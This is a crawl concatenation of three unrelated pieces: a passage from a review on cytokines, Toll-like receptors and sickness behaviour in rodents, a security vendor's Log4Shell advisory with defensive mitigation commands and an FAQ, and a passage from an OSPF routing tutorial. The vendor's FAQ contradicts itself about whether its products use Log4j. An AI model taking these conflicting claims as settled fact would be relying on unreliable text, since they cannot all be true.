enhances recovery from sickness. Soluble gp130 in both in vivo and in vitro models decreases IL-6 signaling, STAT phosphorylation, and the expression of the pro-inflammatory cytokines IL-6 and TNFα but not IL-1β (Burton et al., 2011). Using a genetic KO model, IL-6 deficiency decreases the sickness response to i.p. administration of LPS or IL-1β and the sickness response to i.c.v. LPS or IL-1β (Bluthé et al., 2000b). Thus, normal IL-6 is required for sickness behaviors, but IL-6 alone is insufficient to directly induce sickness. Major depression in patients has been correlated to circulating IL-6 levels. These data provided some of the early evidence that depression may be related to a tonic state of immune activation (Dantzer, 2006). Although there is no evidence that IL-6 induces depression, similar to sickness behavior, mice deficient for IL-6 have diminished depressive-like behavior, illustrated by decreased time of immobility in the FST and TST and a greater preference for a sucrose solution, suggesting lower despair and diminished anhedonia (Chourbaji et al., 2006). Following s.c. LPS, Sprague-Dawley rats elicit typical sickness with a fever and decreased LMA, assessed as running wheel activity (Harden et al., 2006; Harden et al., 2011). Interestingly, treatment with anti-IL-6 blocked the LPS-induced decrease in LMA; however, treatment with anti-TNFα or anti-IL-1β were without effect. These data support the hypothesis that IL-6 is necessary for sickness behavior. 
Inactivation of either TNFα or IL-1β is insufficient to prevent sickness behavior, in agreement with the aforementioned need for only one of these two cytokines for sickness behavior (Bluthé et al., 2000a). There are two possible explanations by which IL-6 is ineffective in itself as an inducer of changes in behavior. One likely candidate is the low level of IL-6 receptors within the brain (Fig. 6). It is possible that the inflammatory response to IL-6 alone is weaker than that of other pro-inflammatory cytokines such as TNFα and IL-1β. However, a stronger candidate is the type of intracellular signaling that occurs post-IL-6R activation (Fig. 5). IL-6 activates the same MAPK and NF-κB pathways as do TNFα and IL-1β and, in addition, activates the JAK → STAT pathway. All three of these pathways lead to an inflammatory response and, in particular, the induction of pro-inflammatory cytokines. However, there is no evidence that IL-6 stimulates ceramide synthesis, which we have implicated in neuron-mediated cytokine-dependent sickness behavior (Palin et al., 2009). Thus, IL-6 is required for a feed-forward loop that amplifies neuroinflammation and CNS cytokine levels, probably by glial expression. In the absence of IL-6, central cytokines do not reach critical levels to induce full-blown sickness behaviors. On the other hand, either TNFα or IL-1β (but not necessarily both) are also needed to induce CNS cytokine expression primarily by glia, but at least one of these is needed to generate ceramide production by neurons and thereby alter neuronal activity. Ceramide production further enhances the MAPK pathways (Kyriakis and Avruch, 2001), leading to an accentuation of the inflammatory pathway in response to cytokines (Fig. 5). Ceramide itself does not signal pro-inflammatory cytokine expression but is a specific MAPK and maybe NF-κB pathway accentuator (Medvedev et al., 1999; Sakata et al., 2007). In brief, low IL-6 results in inadequate neuroinflammation whereas low TNFα + IL-1β results in inadequate neuronal dysfunction. In either case, no sickness behavior occurs. Whether this combination of pathways is involved in depressive-like behaviors has not been directly addressed. Interferons (IFNs) and behavior IFNα has been used to activate the innate immune response to treat patients with viral infections (for example hepatitis C) or cancer. At the onset of treatment, patients develop full-blown sickness behavior. Patients experience fatigue, pain, anorexia and fever. After several weeks of cytokine therapy, approximately one-third of the patients elicit behavioral symptoms of depression (Capuron et al., 2004; Raison et al., 2009). Despite this strong effect with human subjects, the preclinical evidence that IFNs directly induce sickness behavior is lacking. However, O’Connor studied IFNγR-deficient mice infected with Bacillus Calmette-Guérin (BCG) and found that BCG induced the expression of IFNγ within brains and lungs of IFNγR-deficient and wild-type mice (O’Connor et al., 2009a). Even in the absence of IFNγR, mice developed a normal sickness response, suggesting that IFNγ is not required for a sickness response. Similarly, treatment of rats with IFNα does not induce sickness behavior (Kentner et al., 2007). Polyinosinic–polycytidylic acid (Poly I:C) injection into mice induces sickness behavior and IFNβ expression, but sickness was not altered by treatment with an anti-IFNβ neutralizing antibody (Matsumoto et al., 2008b). 
In this same report, rats were directly treated with IFNβ and failed to elicit sickness behavior assessed by wheel-running activity. Similarly, pegylated IFNα-2a or IFNα-2b does not induce sickness in Lewis rats (Loftis et al., 2006) nor does IFNα treatment of Sprague-Dawley rats or C57BL/6J mice (Kentner et al., 2006; Wang et al., 2009). IFN-stimulated genes (ISGs) are expressed at very low levels in the naive brain (Ida-Hosonuma et al., 2005). ISGs are induced in a positive feedback loop, but low initial expression may limit the initial inflammatory response to IFN treatment. This low-level initial response may prevent a strong acute sickness response to IFN treatment. These preclinical data strongly suggest that the IFNs are not directly responsible or required for sickness behavior. The studies with patients suggest that, in a preexisting immune activation (for example hepatitis C infection), IFNα treatment elicits a behavioral response. Prolonged treatment with IFNα results in psychiatric side effects including confusion, manic condition, sleep disturbance and a syndrome characteristic of depression (Paul et al., 2007; Raison et al., 2005). This behavioral response is possibly elicited by an amplification of the actions of other existing pro-inflammatory cytokines, much as described above for IL-6. If IFNs act in a similar way to IL-6 to amplify behaviors elicited by other cytokines, it would be expected that IL-6 and IFNs share a common intracellular signaling mechanism. Indeed, that is the case as illustrated in Fig. 5. All IFNs signal through the JAK → STAT pathway, as does IL-6. After a careful literature search, we could not find evidence that IFNs activate ceramide synthesis within neurons despite the presence of IFN receptors on neurons (Fig. 5). Thus, IFNs alone do not directly alter behavior but instead alter behavior on a background of pre-existent immune activation. Unlike sickness behaviors, there is a probable role of IFNs in the induction of depression. Mice lacking IFNγRs do not develop depressive-like behavior when infected with BCG (O’Connor et al., 2009a). The lack of a depressive-like response may again be analogous to IL-6 action. In the absence of IFNγRs, brain and lung cytokine expression at the time of depressive-like behaviors was less than that of wild-type controls. Similarly, IFNγ-deficient mice have an attenuated cytokine response (Litteljohn et al., 2010). Thus, IFNγ action may be necessary to maintain the expression of other cytokines or elicit a separate but parallel signal that is insufficient alone but is needed to drive depressive-like behaviors. This hypothesis is supported by the lack of depressive-like behaviors of naive mice treated with IFNα (Kosel et al., 2011; Wang et al., 2009). Therein, IFNα treatment alone has no depressive-like effect because there is no pre-existing pro-inflammatory response to amplify. Cytokines and behavior summary The mediating role of cytokines on behavior can be summarized by saying that TNFα (sickness and depression) and IL-1β (sickness) alter behavior by direct actions on neurons probably mediated by ceramide synthesis. In contrast, IL-6 and IFNs play little, if any, direct role in modulating behavior in the absence of other cytokines but amplify the behavior effects induced by TNFα and IL-1β. The direct behavior-altering actions of TNFα and IL-1β on neurons does not preclude a lack of input by other cells within the brain. TNFα and IL-1β regulate glia activity to control uptake and release of neurotransmitters. 
Indeed, a low level of pro-inflammatory cytokine activity within the brain is necessary for normal cognition via maintenance of proper neurotransmitter levels (Yirmiya and Goshen, 2011). It is only when the neuroinflammatory response and input on neurons are at an imbalance that behavior shifts to a sickness or depressive-like state. We believe that inhibition of JNK blocks TNFα-induced sickness because it acts to suppress the feed-forward cytokine loop mediated by the MAPK pathways within glia, whereas FAN deficiency illustrates that cytokines cannot induce behavioral changes unless neuron activity is altered by ceramide (Fig. 5).
TLRs and behavior
The penultimate question that is to be addressed below is: what is the mechanism by which infections induce behavioral changes? Even a cursory literature review would indicate that infection causes sickness. Every person experiences multiple bouts of sickness throughout life and many people experience some form of depression, so we all know that behavior is modified by infections. Clearly, bacterial, fungal, viral or parasitic infection will induce malaise, social withdrawal and fatigue in addition to fever and depressed appetite; this is indisputable. However, to develop new therapies to treat behavioral changes associated with infection, the pathways involved in eliciting these changes must be identified. Identifying these pathways should permit the alleviation of behavioral changes associated with inflammation, without ameliorating the inflammatory response needed to fight the infection. From the above discussion, we have described that infections cause inflammation, inflammation elicits cytokine expression, and cytokine expression changes behavior. Below, we will examine whether all TLRs are involved in this cascade.
TLR5 and TLR11: protein-activated PRRs
A study examining TLR5 activation and sickness illustrates a well-designed approach to the validation of TLR specificity. Flagellin activates TLR5, but infectious agents such as flagellate bacteria also contain other TLR agonists; in this case, Gram-negative bacterial LPS could also activate TLR4 to induce behavioral changes. In a study by Matsumoto, sickness behavior, which was quantified as decreased LMA (wheel-running activity), was induced by the injection of live Salmonella (Matsumoto et al., 2008a). To confirm that this flagellate was acting through TLR5, Salmonella was injected into C3H/HeJ mice, which lack functional TLR4. An almost identical LMA response was found between C3H/HeJ and control (C3H/HeN) mice. In the same study, gentamicin-treated Salmonella, which have reduced flagellin content, have a markedly diminished sickness response compared with non-treated Salmonella. In addition, flagellin-treated mice also respond with diminished LMA, showing that the purified ligand itself induces a sickness behavior. This study, by itself, confirmed that live bacteria elicit sickness through a TLR-specific mechanism that can be mimicked by direct administration of the ligand and can be attenuated by loss of the ligand. Flagellin injection also elicits a systemic inflammatory response (Eaves-Pyles et al., 2001), which is the likely mechanism for the behavioral response as described above. The Matsumoto research also indicates that Salmonella initiates an inflammatory response largely independent of TLR4 and that heat-killed Salmonella, with denatured flagellin, was less potent than live bacteria (Matsumoto et al., 2008a).
It was hypothesized that TLR5 activation by flagellin initiated the immune response. Only after this initiation and attack on live bacteria by the host would LPS be released to activate TLR4 and synergize with the initial response to clear the body of the bacteria. Thus, it is likely that Salmonella elicit full-blown sickness behavior by activating at least two TLRs. Although profilin is necessary for Toxoplasma recognition and activation of cytokines (Plattner et al., 2008; Yarovinsky et al., 2005), the role of this ligand, the subsequent activation of TLR11, the release of IL-12 and the expression of IFNγ in behavioral changes has not been investigated. The human TLR11 analog is a nonfunctional pseudogene and thus does not play a role in the immune response or subsequent behavioral changes (Pifer and Yarovinsky, 2011). Thus, it is not known if TLR11 activation is directly responsible for behavioral changes. TLR3, TLR7, TLR8 and TLR9: nucleic acids Although frequently studied relative to infection, activation of the TLRs that recognize nucleotides – TLR3, TLR7, TLR8 and TLR9 – has been given relatively little attention as direct modifiers of animal behavior, with the exception of studies with TLR3. Poly I:C has proven to be an effective activator of TLR3 and inducer of transient sickness. Systemic administration of poly I:C induces weight loss and diminished food intake. This physiological response is associated with neuroinflammation, especially type I IFNγ/β expression, within the brain. This neuroinflammatory response mimics the peripheral inflammatory response (Field et al., 2010). Poly I:C administration to mice induces a transient slight increase in core body temperature but a strong sickness behavioral response, assessed as a decrease in LMA and burrowing activity (Cunningham et al., 2007). This sickness response is accompanied by a marked increase in circulating IFNβ, IL-6 and TNFα followed by CNS mRNA expression of the same cytokines and, to a lesser extent, IL-1β albeit IFNγ is not increased (Cunningham et al., 2007; Gandhi et al., 2007; Konat et al., 2009). This cytokine profile is similar to that shown in Fig. 2. In addition to a sickness response, poly I:C administered i.p. has been shown to induce chronic fatigue syndrome, evidenced as a prolonged decrease in voluntary wheel-running (LMA) (Katafuchi et al., 2005; Katafuchi et al., 2003). Fatigue was present while CNS IFNα mRNA level was still elevated, but after central IL-1β expression, it had returned to control levels. This TLR3-mediated behavior appears to be a form of central fatigue or depressive-like behavior as it was ameliorated by the anti-depressant imipramine, which is a nonselective serotonin reuptake inhibitor. Although poly I:C induces a prolonged fatigue response and a rapid rise in circulating IFNβ, an acute injection of IFNβ does not mimic this behavioral effect (Matsumoto et al., 2008b). These data suggest that other cytokines are necessary for the behavioral response, as discussed earlier in the IFN section. In addition to prolonged fatigue, prenatal exposure of dams to poly I:C has been used as a model for inflammation-induced schizophrenia-like behaviors that are expressed by the offspring (Macêdo et al., 2012; Piontkewitz et al., 2012). Thus, age-at-exposure to an immune challenge alters the phenotypic expression pattern. With adult mice, poly I:C also decreases swim time (increases immobility) in the FST for up to 1 week post i.p. administration (Sheng et al., 2009). 
Although referred to as a fatigue response within the manuscript, an increase in immobility in the FST is used to assess despair and diagnose depressive-like behavior in preclinical rodent models. The diminished performance in the FST continued for several days after spontaneous cage LMA had returned to normal (an index of sickness); thus distinguishing fatigue/depressive-like behavior from sickness. Exposure to imiquimod, a TLR7 agonist, induces only a modest cytokine response within the brain that is associated with the induction of fever. Similarly, only a modest sickness response was evidenced as a slight decrease in food and water intake but no change in overall LMA of rats (Damm et al., 2012). I have confirmed this and found a modest sickness response to imiquimod with mice (R.H.M., unpublished observations). In contrast, the TLR7 agonist 1V136 induces a potent sickness/anorexic response when administered i.p. but a more potent response when administered intranasally (i.n.) (Hayashi et al., 2008). Intranasal administration elicited a greater behavioral response despite a similar peripheral cytokine response, suggesting that neuroinflammation was responsible for anorexia. These data are consistent with probable transport of the TLR7 agonist directly to the brain via the trigeminal or olfactory pathway when administered i.n. and suggest that activation of TLR3 and TLR7 elicits a behavioral response. These data with TLR3 implicate cytokine production as the mediator of the behavioral changes. TLR2 heterodimers and TLR4: membrane lipids As illustrated in Fig. 2, TLR2 forms heterodimers with TLR1 and TLR6, thereby changing the ligand recognition pattern. Both heterodimer receptors are localized to the plasma membrane to recognize extracellular PAMPs. TLR2 is not considered to be endogenously expressed TLR on naive neurons. However, activation of TLR2/6 heterodimers with macrophage-activating lipopeptide (MALP)-2 derived from Mycoplasma fermentans induced sickness behavior and an accompanying loss of body mass and decrease in food consumption in rats (Knorr et al., 2008). When given s.c., a local inflammatory response, involving elevated expression of TNFα and IL-6, resulted in elevated circulating IL-6 and activation of STAT3 in the organum vasculosum of the laminae terminalis (OVLT), suprafornical organ (SFO) and area postrema (AP) (see Fig. 1). TNFα was not detectable in the circulation (IL-1β was not quantified). This IL-6-dependent activation of cytokine signaling within the circumventricular organs of the brain was accompanied by sickness behavior assessed as decreased home cage activity; i.e. LMA. In a previous study using i.p. injections, MALP-2 and fibroblast-stimulating lipopeptide (FSL)-1, a TLR2/6 synthetic activator based on the structure from Mycoplasma salivarium, induced a transient fever as well as a prolonged decrease in home cage activity, low LMA, and elevated circulating levels of both TNFα and IL-6 (Hübschle et al., 2006). The comparative strength of the immune response between these two studies paralleled sickness behavior, supporting the role of cytokines as mediators of sickness behaviors following TLR2/6 activation. This relationship was confirmed by the use of TNF binding protein. TNFbp blocked the pyrogenic effect of FSL-1 and its ability to induce IL-6 expression (Greis et al., 2007). Zymosan, a yeast particulate, given to rats induced a fever and diminished a motivated behavior: decreased consumption of sweetened cereal (Cremeans-Smith and Newberry, 2003). 
Neither fever nor food disappearance are behaviors per se but, together with behavioral assessment in the previous studies, these physiological responses indicate that zymosan activation of TLR2 signaling is probably a behavior-modifying event. Indeed, zymosan given i.p. to several strains of mice induces full blown sickness behavior including diminished locomotor activity, body writhes (pain) and sedation. The sickness response was attenuated by morphine, which has anti-inflammatory activity (Natorska and Plytycz, 2005). Clearly, TLR4 activation by LPS is the model most prevalent in the literature that is used to induce inflammatory-dependent behavioral changes. Numerous investigators have contributed to this literature and it would be impossible to acknowledge all the important work in a single review. Our recent work has added to the understanding of the sickness response by showing that an i.c.v. dosage as low as 10 ng of LPS induces a central immune response, including elevated expression of TNFα, IL-1β and IL-6 in the brain of mice. Even this low dose of LPS causes full-blown sickness behavior, including depressed LMA and decreased social exploration, together with expected physiological responses such as loss of body mass and reduced food intake (Park et al., 2011a). In contrast, a higher dosage of LPS is required when administered i.p. (Park et al., 2011b). At 330 or 830μg kg–1 body mass i.p. (∼10,000 and 25,000 ng mouse–1, respectively), LPS induces an inflammatory response within the brain and a full spectrum of sickness behaviors. Unlike a low i.c.v. dose, i.p. LPS induces a peripheral immune response, including the induction of circulating IL-6, IL-1β, TNFα and IFNγ (Finney et al., 2012; Gibb et al., 2008). Similar to the well-characterized sickness response, LPS was shown almost 20 years ago to induce behaviors that relate to depression of humans. Systemic injection of LPS in rats causes a typical sickness response and an anhedonic phenotype, assessed as a decreased preference for consumption of a saccharin solution (Yirmiya, 1996). Our recent data support this early literature by showing that central (i.c.v.) or peripheral (i.p.) LPS induces a depressive-like phenotype when quantified as increased time of immobility in the TST and FST (Park et al., 2011a; Park et al., 2011b). The increased time of immobility in these tests is frequently used as an index of despair. More importantly, the depressive-like behavior is still evident after food intake and LMA have returned to normal, indicating that sickness behavior had waned (O’Connor et al., 2009b). This later point is critical to the interpretation of depressive-like behavior. Within the acute-phase immune response to LPS (<24 h for i.p. dosage of 830μg kg–1 body mass), mice have decreased immobility in the LMA test, FST and TST. However, by waiting until LMA activity is back to control levels (>24 h), it is easier to defend the increase in time of immobility as a depressive-like behavior and distinct from sickness behavior. In this same study, minocycline, which decreases cytokine production, prevents both sickness and depressive-like behavior, illustrating that cytokines mediate the behavioral changes. Similarly, the anti-inflammatory COX inhibitors indomethacin and nimesulide and the anti-inflammatory glucocorticoid analog dexamethasone, attenuated i.p. LPS-induced sickness, depressive-like behavior and anxiety of mice (de Paiva et al., 2010). 
In this study, sickness was evident following LPS treatment; decreased food disappearance and loss of body mass. Sickness behavior was evident as a decrease in LMA and number of rearings. Depressive-like behavior was quantified as an increase time of immobility in the FST and TST. Anxiogenic-like behavior was evident following LPS treatment using the light–dark box test wherein LPS caused a reduction in number of transitions between light and dark regions of the box. This extensive behavioral evaluation clearly indicates the global action of LPS on a variety of behaviors and the role of inflammation in a variety of behaviors. Prostaglandin involvement in TLR-mediated behaviors As discussed above within the cytokine section, where either TNFα or IL-1β are required for sickness behaviors, these cytokines are not the only factors involved in LPS-induced behavioral changes. In another study, inhibition of COX-1 alleviates sickness behaviors without changing peripheral or central expression of proinflammatory cytokines (Teeling et al., 2010). In this study, the selective COX-1 inhibitor piroxicam was effective at attenuating the LPS-induced decrease of burrowing activity but not in attenuating LPS-induced LMA. Thus, despite the importance of cytokines in LPS activity, a separate pathway involving prostaglandin production via COX-1 may be requisite for certain behaviors such as species-specific burrowing. Using other inhibitors, Teeling et al. also showed that COX-2 activity, thromboxane production and PPAR-γ activity did not appear to be requisite for LPS activity (Teeling et al., 2010). The mechanism by which COX-1 acts to modulate behavior may involve neuroinflammation, although this was not revealed by the Teeling study. Inhibition of COX-1 activity with SC-560 or COX-1 deficiency attenuates i.c.v. LPS-induced IL-1β and TNFα, but not IL-6, expression within the brain (Choi et al., 2008), suggesting that COX-1 is necessary for the inflammatory activity of LPS. Whether prostaglandins accentuate cytokine-dependent sickness behaviors, playing an amplifying role as described for IL-6 and the IFNs, or have other distinct modus operandi awaits further studies. A study performed 30 years ago, however, does indicate that PGD2 decreases LMA, and this finding supports a direct sickness effect for prostaglandins on sickness behavior (Förstermann et al., 1983). Prostaglandin synthesis is clearly implicated in the febrile response elicited by LPS (Pecchi et al., 2009), but its mediating effect on inflammation-dependent behavior is poorly understood. However, the bulk of the literature implicates cytokines as required initiators and sustainers of both inflammation-induced sickness and depressive-like behaviors. Indeed, inhibition of neuroinflammation, as occurs with i.c.v. administration of IGF-I, results in attenuated depressive-like behaviors, indicating that a naturally occurring neurotrophin feeds back within the CNS to regulate inflammation-induced depression (Park et al., 2011a). Being the most exploited model, some very important aspects of inflammatory-dependent behaviors have been made using LPS as an inducer. Of most importance to this review is the dependence of cytokines in behavior changes. Surprisingly, mice respond to LPS with behavioral changes even when lacking TNF-R1 (Palin et al., 2009) or IL-1R1 (Bluthé et al., 2000a) but require TNFα if the IL-1R1 is absent (Bluthé et al., 2000a). 
Similarly, treatment with neutralizing antibodies to either IL-1β or TNFα does not attenuate LPS-induced changes in behavior, with sickness behavior assessed as burrowing activity (Teeling et al., 2007), because neutralizing both is necessary to block LPS activity. These data indicate that either TNFα or IL-1β alone are able to mediate the sickness response associated with LPS but at least one of these cytokines must be present within the brain to induce sickness. These data strongly suggest that, in the absence of TNFα and IL-1β, the remaining cytokines, including IL-6 and IFNs, and prostaglandins are not sufficient to alter behavior. As described earlier, TNFα or IL-1β administered alone initiate full-blown sickness behaviors, whereas IL-6 and IFNs administered alone are insufficient. IFNγ signaling is needed for LPS to induce depressive-like behaviors (see IFN section), but IFNs administered alone do not cause these behavioral changes. It appears that LPS-induced IL-6 and IFNγ are needed to amplify the actions of TNFα or IL-1β and thus their behavioral response. Nod1 and Nod2: bacterial peptidoglycans Nod1 and Nod2 activation has not been extensively studied with regard to animal behavior. After an extensive search, direct evidence that Nod1 activation induces sickness or depressive-like behavior has been elusive. However, there are reports that bacterial peptidoglycans are direct mediators of sickness via Nod2. The minimally active subunit of bacterial peptidoglycan, muramyl dipeptide (MDP), is able to elicit a decrease in food intake of rats (Fosset et al., 2003). In addition to food disappearance, MDP was shown to change the eating behavior. MDP caused a decrease in eating bout frequency that corresponded with an increase in eating bout duration. This change in eating behavior was accompanied by a greater time resting and less time grooming for MDP-treated rats compared with controls. The increased resting and diminished grooming are considered sickness behaviors. Interestingly, one of only a handful of studies that compare the behavioral effects of various TLR ligands was performed with MDP, LPS and poly I:C (Baillie and Prendergast, 2008). In this study, i.p. administration of LPS caused a loss of body mass, diminution of food disappearance, decrease in consumption of a saccharin solution and decrease in nesting behavior in Siberian hamsters. LPS and poly I:C had similar effects on changes in body mass, food intake and saccharin consumption, but poly I:C did not affect nesting behavior. In direct contrast to poly I:C, MDP did not alter body mass, food intake or saccharin intake but did decrease nesting behavior compared with controls. Reverting to our TLR signaling pathways (Fig. 2), it is possible to propose that the MyD88 pathways activated by TLR2/6 and TLR4 mediate the change in nesting behavior induced by LPS and MDP, respectively, whereas the TRIF-dependent pathways activated by TLR3 and TLR4 via poly I:C and LPS, respectively, regulate feeding and drinking activity and subsequent change in body mass. This, of course, is an oversimplification of the intricacies of the TLR immune response. However, the results do suggest that specific TLR agonists, by themselves, may not fully activate all aspects of sickness. This hypothesis suggests that different symptoms may be related to the induction of a specific combination of cytokines. 
In a separate study, LPS was a more potent anorexic agent than MDP, and this action correlated to the greater ability of LPS to induce TNFα and IL-1β expression in the cerebellum, hippocampus and hypothalamus (Plata-Salamán et al., 1998). Thus, anorexia was related to specific cytokines being expressed in specific brain regions. These data indicate that Nod2 activation can induce behavioral changes, but taken together they clearly indicate that LPS is the most potent inducer of sickness behavior, possibly because it directly induces both of the inflammatory signaling pathways (NF-κB and TRIF) and thus induces the most complete array of cytokine expression.
Reference link: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3515033/
Source: Chapman University
<urn:uuid:a0971663-dd8e-466d-904b-58f78a0f42e9>
CC-MAIN-2022-40
https://debuglies.com/2022/08/31/our-brains-obtain-information-from-sick-people-eliciting-changes-in-our-physiology-and-immune-response/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00221.warc.gz
en
0.908335
12,879
2.96875
3
Understanding the vulnerability
On the morning of December 9, 2021, the security team at Alibaba Cloud published a vulnerability involving arbitrary code execution in Log4j, a widely used Java-based logging framework, which allows threat actors to gain complete remote access to web servers and application logs. The vulnerability was dubbed Log4Shell. The United States Cybersecurity and Infrastructure Security Agency also issued guidance about the vulnerability in Apache’s Log4j software on Monday, December 13, 2021. Subsequently, a second vulnerability was announced due to an incomplete patch.
Apache Log4j is Java software widely used by many companies for logging purposes. It is often included or bundled with third-party software packages. First discovered on the 24th of November, the vulnerability was already being exploited, with cybercriminals scouring the internet to gain access to affected systems. The exploit came at a strategic time, when almost half the workforce was unavailable to man damage-control operations on account of the holiday season.
Present and future considerations
The vulnerability does not directly affect the majority of end consumers owing to the diminishing popularity of Java in consumer programmes; however, the logging library remains in broad use among enterprises. Therefore, the zero-day vulnerability has prompted major corporations and government agencies throughout the world to identify affected systems, patch exploits and install updates to prevent data breaches. As security teams were scrambling to patch the bug, threat actors had already been working on extracting sensitive information and infiltrating systems. Attackers are spreading botnets such as Mirai and Kinsing to perform a variety of illegal activities ranging from remote cryptocurrency mining to DDoS attacks.
Long term impact
As the vulnerability and exploit vectors continue to evolve, the Log4j vulnerability is likely to stay for a long time. Like COVID-19, which keeps mutating and spreading rapidly despite widespread vaccination, the Log4Shell bug is being exploited despite patches being released. Moreover, the attack has the potential of disrupting information exchange and delivery across international tech giants as big as Microsoft and Apple. The timing and scale of the vulnerability can potentially damage global supply chains, similar to the Kaseya VSA ransomware attack witnessed earlier in 2021 but at a much wider scale.
The road ahead
Even though it seems like the bug has gone haywire, all hope is not lost. The Apache Software Foundation, the developer of the Log4j framework, has already released patches and is constantly monitoring the situation, spreading awareness and working with several cyber security teams globally to protect enterprise data. Companies worldwide are being recommended to check their systems for the vulnerability and install updates on affected systems to mitigate damage. Although a patch may seem like a silver-bullet solution for the bug, that is not the case. Apache has already released two versions of the patch in less than a fortnight, and more can be expected owing to the evolving nature of the threat.
The security of BluSapphire products and our customers’ safety is a top priority for us. In response to these vulnerabilities, BluSapphire has taken immediate action to proactively address any critical vulnerability affecting our products and solutions containing the Log4j software library.
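For teams still triaging their own estates, the "check your systems and apply the stopgap" advice above can be scripted. The sketch below is a generic illustration rather than anything vendor-specific; the file path and version shown are placeholders, and upgrading to a patched Log4j release remains the preferred fix.

# Locate Log4j core jars on a host (paths and versions will vary by environment)
find / -type f -name "log4j-core-*.jar" 2>/dev/null

# Stopgap documented by Apache for 2.x versions that cannot be upgraded immediately:
# remove the JndiLookup class from the jar, then restart the affected service
zip -q -d /opt/example-app/lib/log4j-core-2.14.1.jar org/apache/logging/log4j/core/lookup/JndiLookup.class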
Upon notification of the Log4j vulnerability report, the BluSapphire Security Team initiated investigations in accordance with our incident response processes. BluSapphire followed the guidance issued to all Log4j customers in addition to following our internal processes for investigation, forensics analysis, and threat mitigation. BluSapphire will continue to remain vigilant regarding all aspects of this challenging and evolving situation.
At this time, there have been no compromises or successful exploits observed in BluSapphire products, solutions, or in the BluSapphire environment. The majority of our products and solutions are not affected by the vulnerability as we do not use the vulnerable components of Log4j. However, to be extra safe, we have either upgraded the Log4j versions to 2.16 where possible, or disabled JNDI functionality and removed the relevant JMSAppender from our packages. This ensures that our packages are not affected by the disclosed vulnerabilities.
BluSapphire will continue to update this advisory as additional information becomes available and will provide answers to common questions below. This advisory should be considered the single source of current, up-to-date, authorized and accurate information from BluSapphire regarding fully supported products and versions.
Frequently Asked Questions
1. Are BluSapphire products affected by the Log4j vulnerability? Which products were affected?
BluSapphire products do not use Log4j software and therefore are unaffected. However, it may be present in the installation packages as part of transitive dependencies. To avoid any future concerns, these dependencies have been removed from the packages.
2. What remediation actions have been taken?
All BluSapphire products, software and infrastructure have been evaluated and countermeasures have been implemented for protection. Countermeasures are in the form of:
- mitigation steps recommended by Apache Log4j
- removal of vulnerable files from the jar packages
- upgrade to 2.16 where possible
3. Will this incident impact or interrupt the delivery of BluSapphire products and services?
At this time, we are not anticipating any service disruptions for any BluSapphire products or services.
4. What is the impact to BluSapphire’s business?
There is no impact to BluSapphire’s business at this time.
5. How does BluSapphire protect its environment from potentially affected software?
In response to this vulnerability, BluSapphire has followed the recommendations from Apache and the United States Cybersecurity and Infrastructure Security Agency. These actions also include patching and increased monitoring. Our security team works 24x7 to protect BluSapphire.
6. How are BluSapphire’s on-site deployments affected?
As noted before, BluSapphire’s products themselves do not use Log4j functionality and hence are not impacted. However, there may be transitive dependencies that may have inadvertently packaged Log4j unnecessarily. For these deployments, we recommend reaching out to [email protected] for mitigation and/or upgrade options. These support calls will be free.
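The point about transitive dependencies in FAQ items 1 and 6 generalizes to any Java build: log4j-core can arrive through a third-party library even if your own code never calls it. A quick way to check, sketched here for a Maven project (the packaged jar name is illustrative), is:

# List every dependency path that pulls in log4j-core
mvn dependency:tree -Dincludes=org.apache.logging.log4j:log4j-core

# Also inspect already-built artifacts, since fat jars can embed the classes directly
unzip -l target/example-app.jar | grep -i log4j

If a vulnerable version appears, pin or upgrade it to a fixed release in your build before redeploying.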
<urn:uuid:918c4f21-ae1f-4a3f-ade8-2a0ac8a582ba>
CC-MAIN-2022-40
https://www.blusapphire.com/blog/decoding-the-log4shell-pandemic
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00221.warc.gz
en
0.947159
1,274
2.671875
3
In the last post, we talked about some of the basics of OSPF. We discussed how neighbors form adjacencies, the multicast addresses OSPF uses, and some of the timers that OSPF uses. Before we jump into this post I want to cover a few items that I may have left out. Namely, I want to talk about the configuration we used to get to the end state we saw at the end of the first post. Some of the configuration commands we discuss will drive other conversation. Here’s our lab topology…

The configuration for OSPF is not unlike EIGRP. However, there are some rather distinct differences. Let’s look at the configuration of router1 to get a sense for how the configuration works…

This is basically it. Again, we are using sub interfaces since the routers I have only have two Ethernet interfaces. The OSPF configuration looks remarkably similar to that of EIGRP with a few exceptions. First off, the ‘router ospf 1’ does not mean the same thing that it did in EIGRP. In EIGRP, the number following the ‘router eigrp’ command was the AS (Autonomous System) number. This HAD to match on any routers that you wanted to become neighbors. In OSPF, it’s actually a number symbolizing a process ID. With that being the case, it does NOT need to match on routers that you would like to become neighbors. Secondly, you’ll notice the addition of the ‘area 0’ tacked onto the end of the network definition. This is a considerable change from EIGRP. EIGRP had a single plane that all routers ran on. OSPF can be separated into different areas, with routes distributed between them based on what type of area they are. This is a large advantage over EIGRP (in some people’s minds) since it limits the number of advertisements. Let’s talk a little bit about areas and then dive into router roles…

OSPF works off of the concept of areas. Regardless of how many areas you intend to build, there will always be one area. That one area that MUST exist is area 0. Area 0 is also commonly referred to as the backbone area. All other areas MUST connect to area 0. Since OSPF is a link state protocol, by default, each router wants to have all of the information available so it can make its own decisions about the best path. Areas break that definition slightly. Routers in one area will have full topological awareness of each and every router in the same area. However, routers in different areas don’t. To put that a different way, routers in different areas have different link state databases. This also means that any LSA flooding (for certain LSAs) occurs only within a single area. When we talk about traffic flowing through areas, we categorize the traffic in 3 main ways. Intra-area traffic is the traffic within a single area. Inter-area traffic represents traffic shared between areas. And finally external traffic represents traffic coming in from a different routing source (AKA another IGP). There are different ‘kinds’ of areas but this isn’t worth discussing until we get a little more information about LSAs. That quick discussion on areas lends itself nicely to talking about the different router types. Router types are essentially defined by the area(s) they are in.

Internal routers – A router that has all of its interfaces in the same area. It can be assumed that there will also be only one copy of the link state database on internal routers.

Area Border Routers (ABRs) – ABRs can be thought of as bridging routers. The ABR bridges traffic from one or more non-backbone areas to the backbone area. An ABR MUST have one interface in the backbone.
This being said, ABRs maintain two or more link state databases, one for each area they attach to.

Backbone routers – I’m not even sure why they make this distinction since it’s a rather general one. Essentially any router that has at least one interface in area 0 is a backbone router. Internal routers and ABRs could both be backbone routers.

Autonomous System Boundary Routers (ASBRs) – ASBRs are routers that redistribute information from another routing protocol into OSPF. An ASBR can live anywhere in the OSPF topology except in a stub area (we’ll see why shortly).

